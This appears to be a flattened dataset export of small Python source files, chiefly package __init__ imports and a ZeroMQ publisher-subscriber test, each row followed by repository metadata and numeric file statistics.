main() | 18.111111 | 45 | 0.539877 | 25 | 163 | 3.2 | 0.52 | 0.3 | 0.25 | 0.375 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196319 | 163 | 9 | 46 | 18.111111 | 0.610687 | 0.269939 | 0 | 0 | 0 | 0 | 0.068376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7d05b1e5b65fc151ebf19a8dc46105621faeb9d1 | 76 | py | Python | torchlib/datasets/__init__.py | CarlosPena00/kaggle-datasciencebowl-2018 | c234f03483142f618825812d5fa310375a7eb6fa | [
"MIT"
] | null | null | null | torchlib/datasets/__init__.py | CarlosPena00/kaggle-datasciencebowl-2018 | c234f03483142f618825812d5fa310375a7eb6fa | [
"MIT"
] | null | null | null | torchlib/datasets/__init__.py | CarlosPena00/kaggle-datasciencebowl-2018 | c234f03483142f618825812d5fa310375a7eb6fa | [
"MIT"
] | 2 | 2018-12-16T00:17:40.000Z | 2019-11-18T09:47:23.000Z |
from .dsxbdata import *
from .ctechdata import *
from .imageutl import *
| 10.857143 | 24 | 0.723684 | 9 | 76 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197368 | 76 | 6 | 25 | 12.666667 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7d405b30bc0bef9d0fe269e4ce56869f39aa23f3 | 119 | py | Python | short_lived_tokens/endec/__init__.py | FriedBotStudio/short_lived_tokens | dd823cfd81ae6e211f9281826bb367a8fcb6fd5a | [
"MIT"
] | null | null | null | short_lived_tokens/endec/__init__.py | FriedBotStudio/short_lived_tokens | dd823cfd81ae6e211f9281826bb367a8fcb6fd5a | [
"MIT"
] | null | null | null | short_lived_tokens/endec/__init__.py | FriedBotStudio/short_lived_tokens | dd823cfd81ae6e211f9281826bb367a8fcb6fd5a | [
"MIT"
] | null | null | null | from short_lived_tokens.endec.engine import EndecEngine
from short_lived_tokens.endec.rsa_engine import RSAEndecEngine
| 39.666667 | 62 | 0.89916 | 17 | 119 | 6 | 0.588235 | 0.176471 | 0.27451 | 0.392157 | 0.490196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067227 | 119 | 2 | 63 | 59.5 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
addb111c0815305675f44504a409da95bcbd1d1c | 28 | py | Python | xrsigproc/__init__.py | kaipak/xrsigproc | 109cab137ea7e9e61a3cdffe6b8cbac8bd52fc3f | [
"MIT"
] | null | null | null | xrsigproc/__init__.py | kaipak/xrsigproc | 109cab137ea7e9e61a3cdffe6b8cbac8bd52fc3f | [
"MIT"
] | null | null | null | xrsigproc/__init__.py | kaipak/xrsigproc | 109cab137ea7e9e61a3cdffe6b8cbac8bd52fc3f | [
"MIT"
] | null | null | null | from .xrsigproc import *
| 14 | 27 | 0.678571 | 3 | 28 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 28 | 1 | 28 | 28 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
adeeb83881cf0b29cee8848279015e85dd9622e2 | 71 | py | Python | gpgLabs/EM/__init__.py | victortocantins/gpgLabs | 310b69c681dd1ebf91ba8be2b5ac27adf5fc0f12 | [
"MIT"
] | null | null | null | gpgLabs/EM/__init__.py | victortocantins/gpgLabs | 310b69c681dd1ebf91ba8be2b5ac27adf5fc0f12 | [
"MIT"
] | null | null | null | gpgLabs/EM/__init__.py | victortocantins/gpgLabs | 310b69c681dd1ebf91ba8be2b5ac27adf5fc0f12 | [
"MIT"
] | null | null | null | from . import FEM3loop
from . import FEMpipe
from . import ResponseFct
| 17.75 | 25 | 0.788732 | 9 | 71 | 6.222222 | 0.555556 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016949 | 0.169014 | 71 | 3 | 26 | 23.666667 | 0.932203 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bc1b34a776cfb4ef22883529b144cf5750666882 | 96 | py | Python | venv/lib/python3.8/site-packages/setuptools/__init__.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/setuptools/__init__.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/setuptools/__init__.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/21/e4/69/64abd25b8c299895c989a21f571e044f02e365df9ae7b460d42f2e3b1b | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4375 | 0 | 96 | 1 | 96 | 96 | 0.458333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bc213c8197e7bdffa409e407d93312481e196b5f | 77 | py | Python | snippets/super_simple/sys.py | fpiantini/python_snippets | 3d7ad42c2e3a77f46c8e373bb51ea3227801a239 | [
"MIT"
] | null | null | null | snippets/super_simple/sys.py | fpiantini/python_snippets | 3d7ad42c2e3a77f46c8e373bb51ea3227801a239 | [
"MIT"
] | null | null | null | snippets/super_simple/sys.py | fpiantini/python_snippets | 3d7ad42c2e3a77f46c8e373bb51ea3227801a239 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
import sys
print(sys.version)
print(sys.float_info)
| 11 | 21 | 0.74026 | 13 | 77 | 4.307692 | 0.769231 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103896 | 77 | 6 | 22 | 12.833333 | 0.811594 | 0.25974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
bc28113660044d65cef0416f1e88f3f44fcb6fdc | 29 | py | Python | scuttle/__init__.py | scuttle/python-scuttle | 273e793b15b4f4390b3991ba66192d27b392ed3a | [
"MIT"
] | 1 | 2021-03-30T05:31:19.000Z | 2021-03-30T05:31:19.000Z | scuttle/__init__.py | scuttle/python-scuttle | 273e793b15b4f4390b3991ba66192d27b392ed3a | [
"MIT"
] | 9 | 2020-05-23T07:33:00.000Z | 2020-09-27T03:32:51.000Z | scuttle/__init__.py | scuttle/python-scuttle | 273e793b15b4f4390b3991ba66192d27b392ed3a | [
"MIT"
] | null | null | null | from .wrapper import scuttle
| 14.5 | 28 | 0.827586 | 4 | 29 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bc2f2035ec6f7f2e3ab05b873bace145372a009a | 1,759 | py | Python | retired/old_version/original/tests/test_echo_topic.py | gecko-robotics/pygecko | a809593a894d8e591e992455a01aa73d8f7b7981 | [
"MIT"
] | 3 | 2019-06-13T07:52:12.000Z | 2020-07-05T13:28:43.000Z | retired/old_version/original/tests/test_echo_topic.py | walchko/pygecko | a809593a894d8e591e992455a01aa73d8f7b7981 | [
"MIT"
] | 23 | 2017-07-07T01:29:33.000Z | 2018-11-23T18:41:08.000Z | retired/old_version/original/tests/test_echo_topic.py | MomsFriendlyRobotCompany/pygecko | a809593a894d8e591e992455a01aa73d8f7b7981 | [
"MIT"
] | null | null | null |
from __future__ import print_function
# import sys
import threading
import time
from pygecko import ZmqClass as Zmq
from pygecko import Messages as Msg
# from pygecko.Topic import TopicPub
# import random
# import zmq
def subscriber(msg):
# Subscribe to everything
sub = Zmq.Sub('test', connect_to=('localhost', 9000))
# Get and process messages
for i in range(7):
tp, ret = sub.recv()
if ret:
assert ret == msg
print('found:', ret == msg)
return
time.sleep(0.1)
def publisher(msg):
# Prepare publisher
pub = Zmq.Pub(bind_to=('localhost', 9000))
for i in range(7):
pub.pub('test', msg)
time.sleep(0.1)
def test():
msg = Msg.Vector()
msg.set(1, 2, 3)
pub_thread = threading.Thread(target=publisher, args=(msg,))
pub_thread.daemon = True
pub_thread.start()
sub_thread = threading.Thread(target=subscriber, args=(msg,))
sub_thread.daemon = True
sub_thread.start()
pub_thread.join()
sub_thread.join()
time.sleep(0.1)
# def topic(msg):
# # Subscribe to everything
# sub = Zmq.Sub('test', connect_to=('localhost', 9000))
#
# # Get and process messages
# for i in range(7):
# tp, ret = sub.recv()
# if ret:
# assert ret == msg
# print 'found:', ret == msg
# return
# time.sleep(0.1)
#
#
# def echo(msg):
# # Prepare publisher
# pub = Zmq.Pub(bind_to=('localhost', 9000))
#
# for i in range(7):
# pub.pub('test', msg)
# time.sleep(0.1)
#
#
# def test():
# msg = Msg.Vector()
# msg.set(1, 2, 3)
#
# pub_thread = threading.Thread(target=publisher, args=(msg,))
# pub_thread.daemon = True
# pub_thread.start()
# sub_thread = threading.Thread(target=subscriber, args=(msg,))
# sub_thread.daemon = True
# sub_thread.start()
#
# pub_thread.join()
# sub_thread.join()
# time.sleep(0.1)
| 19.544444 | 64 | 0.660034 | 264 | 1,759 | 4.30303 | 0.231061 | 0.06338 | 0.052817 | 0.058099 | 0.819542 | 0.816901 | 0.816901 | 0.816901 | 0.816901 | 0.816901 | 0 | 0.026371 | 0.180785 | 1,759 | 89 | 65 | 19.764045 | 0.761971 | 0.486072 | 0 | 0.16129 | 0 | 0 | 0.037471 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.16129 | 0 | 0.290323 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bc3010ebef6a73224f62b6c4ac588d33a3fe7866 | 34 | py | Python | script1-master.py | julie-rudolph/ktbyers-pynet | f8f9f126e44a10bcd5f4886b6923693a70e69534 | [
"Apache-2.0"
] | null | null | null | script1-master.py | julie-rudolph/ktbyers-pynet | f8f9f126e44a10bcd5f4886b6923693a70e69534 | [
"Apache-2.0"
] | null | null | null | script1-master.py | julie-rudolph/ktbyers-pynet | f8f9f126e44a10bcd5f4886b6923693a70e69534 | [
"Apache-2.0"
] | null | null | null | print "script1 in master branch."
| 17 | 33 | 0.764706 | 5 | 34 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.147059 | 34 | 1 | 34 | 34 | 0.862069 | 0 | 0 | 0 | 0 | 0 | 0.735294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
70ee17fb156c0e558ae9a41381bbf54da6eea839 | 233 | py | Python | python_modules/libraries/dagster-papertrail/dagster_papertrail/__init__.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 4,606 | 2018-06-21T17:45:20.000Z | 2022-03-31T23:39:42.000Z | python_modules/libraries/dagster-papertrail/dagster_papertrail/__init__.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 6,221 | 2018-06-12T04:36:01.000Z | 2022-03-31T21:43:05.000Z | python_modules/libraries/dagster-papertrail/dagster_papertrail/__init__.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 619 | 2018-08-22T22:43:09.000Z | 2022-03-31T22:48:06.000Z | from dagster.core.utils import check_dagster_package_version
from .loggers import papertrail_logger
from .version import __version__
check_dagster_package_version("dagster-papertrail", __version__)
__all__ = ["papertrail_logger"]
| 25.888889 | 64 | 0.849785 | 28 | 233 | 6.357143 | 0.428571 | 0.134831 | 0.213483 | 0.292135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085837 | 233 | 8 | 65 | 29.125 | 0.835681 | 0 | 0 | 0 | 0 | 0 | 0.150215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.